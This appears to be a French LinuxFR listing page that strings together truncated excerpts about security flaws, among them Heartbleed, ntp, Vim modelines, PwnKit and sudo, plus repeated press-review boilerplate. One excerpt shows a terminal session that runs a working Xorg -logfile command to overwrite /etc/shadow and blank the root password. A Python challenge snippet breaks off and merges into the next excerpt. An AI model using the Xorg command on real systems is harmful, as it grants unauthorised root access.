Bonjour nal,
Si je prends la plume si précipitamment aujourd'hui, c'est parce qu'il est urgent de t'avertir d'une faille critique dans le code d'une librairie qui t'es chère. En effet, un dépassement de tampon dans l'implémentation Openssl de l'extension "heartbeat" du protocole TLS a été découvert. Je suppose que tu as le coeur brisé par cette nouvelle, mais je t'en supplie, ton sang ne doit faire qu'un tour, et tu dois migrer vers une version sûre, comme la 1.0.1.g.
La revue de presse de l'April est régulièrement éditée par les membres de l'association. Elle couvre l'actualité de la presse en ligne, liée au logiciel libre. Il s'agit donc d'une sélection d'articles de presse et non de prises de position de l'association de promotion et de défense du logiciel libre.
De multiples failles de sécurité ont été identifiées et comblées dans ntp (le logiciel de ntp.org, pas le protocole NTP en général) ces derniers jours. Il s'agit de plusieurs failles avec notamment :
Elles ne sont pas forcément exploitables ou d'une grande dangerosité en dehors d'une d'utilisation avancée / serveur ntpd, mais il est préférable d'être prévenu :)
Cette faille a été identifiée et nommée CVE-2014-9295. Elle concerne toutes les versions de ntp jusqu'à la 4.2.7 et la version corrective 4.2.8 est parue le 18 décembre 2014.
NdM : il existe d'autres logiciels libres pouvant servir pour la synchronisation NTP, comme openntpd (non vulnérable) issu d'OpenBSD, Ntimed (client uniquement) sponsorisé par la Linux Foundation, chrony, etc.
La vulnérabilité est tombée hier:
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
Il s'agit d'execution de code, possiblement distante (merci netcat) en exploitant une //faille// dans la gestion des modeline (Fonctionnalité qui permet de configurer vim pour le buffer courant, via une ligne spécialement formaté au début du fichier)
L'astuce intéressante est que, par l'utilisation de caractères d'échappement, l'attaquant peut même rendre la ligne malicieuse invisible via cat.
Des mitigations existent (désactiver les modelines), tout est détaillé sur la page.
[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
C'est marrant de voir comment toute faille découverte doit avoir son petit nom maintenant. C'est à celui qui aura la plus grosse le plus de succès.
Il n'empêche que celle-ci à l'air pas mal. La société Zimperium a annoncée sur son blog la découverte d'une faille qui toucherait 95% des mobiles Android. Celle-ci permettrait d'exécuter du code à distance uniquement avec un numéro de téléphone, le votre, et un MMS.
La faille se situerait dans la bibliothèque de lecture (…)
Aujourd’hui, je propose à ceux qui s’ennuient un petit défi de cybersécurité en Python.
Voici un script Python qui semble trivial, et qui contient une faille de sécurité :
#!/usr/bin/env python3
import random
SECRET = ''.join(random.choice("0123456789") for i in range(64))
class Sandbox:
def ask_age(self):
self.age = input("How old are you ? ")
self.width = input("HowPour ceux qui se demandent encore si ils doivent vraiment changer leurs mots de passe suite à l'affaire Heartbleed, qui veulent comprendre pourquoi il ne fallait pas le faire trop tôt, ou qui n'ont pas vérifié si leur navigateur détecte les certificats révoqués, l'article Taxonomie des attaques Heartbleed recense et explique schématiquement les diverses attaques rendues possibles par le bug, y compris contre les logiciels clients (reverse heartbleed), Tor et les VPN.
« Heartbleed » est une des pires failles qui soient arrivées à la sécurité sur Internet. À cause d'elle, les pirates ont pu ou peuvent obtenir des données confidentielles sans avoir besoin d'intercepter les échanges. Après les premières réactions centrées sur la mise à jour des serveurs web vulnérables, la révocation des certificats et le renouvellement des mots de passe, il a fallu quelques jours de plus pour comprendre que la faille Heartbleed affecte également les logiciels clients, les échanges SSL/TLS autres que HTTPS, et une multitude d'appareils embarqués qui ne recevront jamais de mise à jour logicielle.
Plus de détails dans la suite de la dépêche.
En 2013, ce monsieur https://ryiron.wordpress.com/2013/12/16/argv-silliness/ prévenait sur la possibilité d'exploitation d'une faille dans pkexec parce que les arguments n'étaient pas correctement vérifiés.
Il proposa même un patch: https://pastebin.com/MheuF2UY
Problème, il semble que son mail ne soit jamais arrivé jusqu'à la liste de diffusion…
https://twitter.com/ryiron/status/1486207182404472832
On peut se dire qu'aujourd'hui, heureusement tout a changé, avec la démocratisation des github/gitlab favorisant la communication avec les mainteneurs d'un projet.
Pour ceux qui n'auraient pas suivi: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Pour continuer sur les discussions autour d'Android du moment sur LinuxFR.
Source : https://app.beebom.com/qualcomm-patches-critical-flaw-dozens-snapdragon-socs/
Traduction :
Des chercheurs du groupe NCC, une compagnie spécialisée dans la cybersécurité, ont découvert une vulnérabilité critique qui affecte des dizaines de puces Qualcomm utilisés dans les téléphones et tablettes Android.
D’après les rapports, pas moins de 46 puces Qualcomm, incluant les SD820, 835, 845, 855, 625, 636, 660, 670 sont probablement impactés par la vulnérabilité qui permet d’autoriser des attaquants potentiels à accéder à (…)
La revue de presse de l'April est régulièrement éditée par les membres de l'association. Elle couvre l'actualité de la presse en ligne, liée au logiciel libre. Il s'agit donc d'une sélection d'articles de presse et non de prises de position de l'association de promotion et de défense du logiciel libre.
La revue de presse de l'April est régulièrement éditée par les membres de l'association. Elle couvre l'actualité de la presse en ligne, liée au logiciel libre. Il s'agit donc d'une sélection d'articles de presse et non de prises de position de l'association de promotion et de défense du logiciel libre.
Bonjour nal,
Je ne peux m'empêcher de mettre en parallèle les gains ahurissants de performance de Firefox depuis un an (cf la dernière dépêche en date) avec la dégradation tout aussi ahurissante des performances Intel depuis un an.
Tandis que les développements du premier sont entièrement tendus vers les moyens d'accroître la vitesse et la réactivité du logiciel (en même temps que sa sécurité et de proposer des outils de défense de la vie privée aux utilisateurs) (…)
Une nouvelle version de sudo est sortie. Elle corrige une faille assez sévère.
L'option pwfeedback est une option qui offre un retour visuel lors de la saisie du mot de passe, en affichant des étoiles. Le bogue entraîne un dépassement de tampon, notamment lorsqu’un utilisateur, même non enregistré, tape ^U (effacer la ligne) sur un longue chaîne.
Cette option est désormais ignorée dans un environnement hors TTY, propice à ce comportement. Elle est toutefois rarement activée par défaut.
Cette (…)
La revue de presse de l'April est régulièrement éditée par les membres de l'association. Elle couvre l'actualité de la presse en ligne, liée au logiciel libre. Il s'agit donc d'une sélection d'articles de presse et non de prises de position de l'association de promotion et de défense du logiciel libre.